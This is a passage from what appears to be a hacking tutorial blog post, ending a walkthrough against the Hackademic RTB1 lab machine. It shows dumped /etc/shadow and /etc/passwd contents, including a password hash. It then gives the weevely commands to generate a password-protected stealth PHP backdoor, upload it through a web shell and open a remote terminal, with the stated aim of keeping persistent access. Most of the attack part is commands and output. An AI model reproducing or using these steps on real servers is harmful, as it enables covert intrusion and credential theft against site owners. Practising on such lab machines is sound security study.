nobody:*:14495:0:99999:7:::
vcsa:!!:14557::::::
avahi-autoipd:!!:14557::::::
ntp:!!:14557::::::
dbus:!!:14557::::::
rtkit:!!:14557::::::
nscd:!!:14557::::::
tcpdump:!!:14557::::::
avahi:!!:14557::::::
haldaemon:!!:14557::::::
openvpn:!!:14557::::::
apache:!!:14557::::::
saslauth:!!:14557::::::
mailnull:!!:14557::::::
smmsp:!!:14557::::::
smolt:!!:14557::::::
sshd:!!:14557::::::
pulse:!!:14557::::::
gdm:!!:14557::::::
p0wnbox.Team:$6$rPArLuwe8rM9Avwv$a5coOdUCQQY7NgvTnXaFj2D5SmggRrFsr6TP8g7IATVeEt37LUGJYvHM1myhelCyPkIjd8Yv5olMnUhwbQL76/:14981:0:99999:7:::
mysql:!!:14981::::::
And view /etc/passwd file
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:499:virtual console memory owner:/dev:/sbin/nologin
avahi-autoipd:x:499:498:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rtkit:x:498:494:RealtimeKit:/proc:/sbin/nologin
nscd:x:28:493:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
avahi:x:497:492:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
haldaemon:x:68:491:HAL daemon:/:/sbin/nologin
openvpn:x:496:490:OpenVPN:/etc/openvpn:/sbin/nologin
apache:x:48:489:Apache:/var/www:/sbin/nologin
saslauth:x:495:488:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
mailnull:x:47:487::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:486::/var/spool/mqueue:/sbin/nologin
smolt:x:494:485:Smolt:/usr/share/smolt:/sbin/nologin
sshd:x:74:484:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pulse:x:493:483:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
gdm:x:42:481::/var/lib/gdm:/sbin/nologin
p0wnbox.Team:x:500:500:p0wnbox.Team:/home/p0wnbox.Team:/bin/bash
mysql:x:27:480:MySQL Server:/var/lib/mysql:/bin/bash
We can crack all users passwords with the “john the ripper” tool.
But we will not do this; we want to maintain access on this server so we can come to visit/hack it any time J
We will use weevely to a small and encoded php backdoor with the password protected and upload this php backdoor to our server.
Let’s do it
1 – weevely usage options :
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
root@bt:/pentest/backdoors/web/weevely# ./main.py -
Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Usage: main.py [options]
Options:
-h, --help show this help message and exit
-g, --generate Generate backdoor crypted code, requires -o and -p .
-o OUTPUT, --output=OUTPUT
Output filename for generated backdoor .
-c COMMAND, --command=COMMAND
Execute a single command and exit, requires -u and -p
.
-t, --terminal Start a terminal-like session, requires -u and -p .
-C CLUSTER, --cluster=CLUSTER
Start in cluster mode reading items from the give
file, in the form 'label,url,password' where label is
optional.
-p PASSWORD, --password=PASSWORD
Password of the encrypted backdoor .
-u URL, --url=URL Remote backdoor URL .
2 – Creating a php backdoor with password koko by using weevely:
?
1
2
3
4
5
6
7
8
root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o hax.php -p koko
Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
+ Backdoor file 'hax.php' created with password 'koko'.
3 – Upload our php backdoor to server using php web shell
And after we upload it we will connect to it using
?
01
02
03
04
05
06
07
08
09
10
11
12
root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u http://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -p koko
Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
+ Using method 'system()'.
+ Retrieving terminal basic environment variables .
[apache@HackademicRTB1 /var/www/html/Hackademic_RTB1/wp-content/plugins]
Testing our hax.php backdoor

Conclusion:

In this article we learned some techniques that are being used by hackers to target and hack your site and your server. I hope you liked this article and enjoyed it.
In next article we will learn how we can secure your site from these attacks and more, so your website will be very secured against many hacker attacks, even advanced ones!

x

   First Name:
* Your Email Address:
 

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More